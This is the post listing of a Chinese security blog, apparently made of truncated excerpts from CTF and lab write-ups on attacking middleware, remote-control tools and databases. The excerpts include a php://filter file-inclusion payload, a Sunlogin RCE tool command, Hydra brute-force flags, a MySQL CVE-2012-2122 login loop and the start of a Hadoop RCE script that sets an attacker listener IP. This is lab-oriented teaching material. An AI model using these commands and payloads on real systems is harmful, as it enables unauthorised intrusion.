矢幽武博客

[ACTF2020 新生赛]Include原始题目提供的信息是： http://xxx.xxx.xxx:xxx?file=flag.php伪协议漏洞 解题// 在URL传入一个伪协议的参数尝试读取文件 ?file=php://filter/convert.base64-encode/resource=index.php// 得到如下的编码信息： PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V ...

easy_web获取初观网址，原本没什么东西。但仔细看的化还是看出了一点由头。 页面源代码简单，如下： <img src='data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAKgAAAC9CAYAAAAnUDacAAAAAXNSR0IArs4c6QAAAAlwSFlzAAAXEgAAFxIBZ5/SUgAAQABJREFUeAHs3emSXTd2LersyWSjpqrssn3cRPjneZH7dvfxHOEfDocdbqqRVJLYJJntHd/EHsnFrSRVklW6PnEMEgksNBMTEwMT7Vr74OB/zP9I4L+xBA7v7u7+n/D3//435vF/WPu/WAInqfsnsf/7/2IZ/E/V/xtL4OTy8vIgWnTsH8vn4eHhJL25uZl8x8fH83x7e3tQ2zRv3749+Oabbw5evHhx8PLly/F/+eWXB//+7/9+wH316tVYcRcXFwfX19cHJycnB6WJNzTr1u9ZmtPT04PHjx+Pffbs2cHz588PuL/4xS8O/uzP ...

总览知识点：中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，K8s，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jetty，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等0、中间件-K8s安全1、中间件-Jetty安全2、中间件-Docker安全3、中间件-WebSphere安全 章节内容：常见中间件的安全测试：1、配置不当-解析&弱口令2、安全机制-特定安全漏洞3、安全机制-弱口令爆破攻击4、安全应用-框架特定安全漏洞 前置知识：中间件安全测试流程：1、判断中间件信息-名称&版本&三方2、判断中间件问题-配置不当&公开漏洞3、判断中间件利用-弱口令&EXP&框架漏洞 应用服务安全测试流程：见图1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等3、判断服务利用方式-特定漏洞&未授权&弱口令等 实例中间件-K8s- ...

前车之鉴学习需要，本地搭建vulfocus靶场出现了无法拉取镜像的什么管理员错误，现在说一个简单的搭建方法。 如果着急使用自己的靶场的朋友，可以按照我这种套路直接搭建云靶场。 如果想长期搭建云靶场的，也可以参照这个办法，不过前提是国内网站你得备案，至于非大陆地区么…… 如果不着急搭建的，想试试本地搭建的，只要感兴趣，时间宽裕，可以试试。 阿里云闪搭vulfocus第一步：买靶机事先声明，买主机前主机把账号问题搞定了。 1.选择云服务器ECS2.ECS配置成下面样子后，使用Xshell连接。搞完这些，直接购买就临时拥有自己的一个主机靶场了。 第二步：docker 闪搭vulfocusxshell连接云主机，这步掠过 接下来是如何使用docker命令安装靶场 # docker下载靶场镜像docker pull vulfocus/vulfocus# 查看镜像的IDdocker images # 绑定靶场镜像，启动靶场docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e 8.218.252.91 8e55f ...

总览知识点：中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等1、中间件-Weblogic安全2、中间件-JBoos安全2、中间件-Jenkins安全3、中间件-GlassFish安全 章节内容：常见中间件的安全测试：1、配置不当-解析&弱口令2、安全机制-特定安全漏洞3、安全机制-弱口令爆破攻击4、安全应用-框架特定安全漏洞 前置知识：中间件安全测试流程：1、判断中间件信息-名称&版本&三方2、判断中间件问题-配置不当&公开漏洞3、判断中间件利用-弱口令&EXP&框架漏洞 应用服务安全测试流程：1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等3、判断服务利用方式-特定漏洞&未授权&弱口令等 实例中间件-Weblogic-工 ...

总览知识点：中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jira，Struts2（被淘汰），Laravel，Solr，Shiro，Thinkphp， Spring ，Flask，jQuery等 中间件单间平台，框架有源码以及一个完整的套用体系。 1、中间件-IIS-短文件&解析&蓝屏等2、中间件-Nginx-文件解析&命令执行等3、中间件-Apache-RCE&目录遍历&文件解析等4、中间件-Tomcat-弱口令&文件上传&文件包含等 前置知识：中间件安全测试流程：1、判断中间件信息-名称&版本&三方2、判断中间件问题-配置不当&公开漏洞3、判断中间件利用-弱口令&EXP&框架漏洞 应用服务安全测试流程：1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等3、判断服务利用方式-特定漏洞&未授权& ...

总览知识点：1、远程控制-第三方应用安全2、三方应用-向日葵&VNC&TV3、设备平台-Zabbix&Kibana漏洞 章节内容：常见服务应用的安全测试：1、配置不当-未授权访问2、安全机制-特定安全漏洞3、安全机制-弱口令爆破攻击 前置知识：应用服务安全测试流程：见图1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等3、判断服务利用方式-特定漏洞&未授权&弱口令等 实例远程控制-向日葵&Vnc&Teamviewer 向日葵 RCE # 网络公开的exp工具：https://github.com/Mr-xn/sunlogin_rcexrkRce.exe -h 192.168.46.157 -t scanxrkRce.exe -h 192.168.46.157 -t rce -p 49712 -c "ipconfig"# 可以尝试fantanshell到自己的服务器 Teamviewer 通过网页调用出命令执行。CSRF办不到这点。 <!DOCT ...

概览知识点：1、服务攻防-远程控制&文件传输等2、远程控制-RDP&RDP&弱口令&漏洞3、文件传输-FTP&Rsync&弱口令&漏洞 前置知识：应用服务安全测试流程：见图 1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等3、判断服务利用方式-特定漏洞&未授权&弱口令等 实例口令猜解-Hydra-FTP&RDP&SSHhttps://github.com/vanhauser-thc/thc-hydrahydra是一个自动化的爆破工具，暴力破解弱密码，是一个支持众多协议的爆破工具，已经集成到KaliLinux中，直接在终端打开即可 Hydra，简称九头蛇-s PORT 可通过这个参数指定非默认端口。-l LOGIN 指定破解的用户，对特定用户破解。-L FILE 指定用户名字典。-p PASS 小写，指定密码破解，少用，一般是采用密码字典。-P FILE 大写，指定密码字典。-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探 ...

概览知识点：1、服务攻防-数据库类型安全2、influxdb-未授权访问-jwt验证3、H2database-未授权访问-配置不当4、CouchDB-权限绕过配合RCE-漏洞5、ElasticSearch-文件写入&RCE-漏洞 前置知识：应用服务安全测试流程： 1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等3、判断服务利用方式-特定漏洞&未授权&弱口令等 实例Influxdb-未授权访问-Jwt验证不当默认端口：8086 8088influxdb是一款著名的时序数据库，其使用jwt作为鉴权方式。在用户开启了认证，但未设置参数shared-secret的情况下，jwt的认证密钥为空字符串，此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。根本：JWT空密匙加密导致的漏洞。 1、借助jwt官网 来生成jwt token： { "alg": "HS256", "typ": "JWT"&# ...

前置知识：应用服务安全测试流程：见图 判断服务开放情况（具备服务才能继续测试） 端口扫描 组合应用 信息来源等 判断服务类型归属 数据库 文件传输 通讯等 远程控制等 判断服务利用方式 特定漏洞 未授权 弱口令等 实例Mysql-未授权访问-CVE-2012-2122利用复现环境：vulhub 内置端口33067 # 爆破数据库账密的方法安装mysql并且进行下面的测试for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done Hadoop-未授权访问-内置配合命令执行RCE复现环境：vulfocus（本地环境复现经常出bug，推荐到云服务做测试） import requests# 目标服务器的网址target = 'http://123.58.236.76:31361/'# 自己搭建的外部服务器的IP地址lhost = '47.94.236.117' ## put your local host ip here, and listen at ...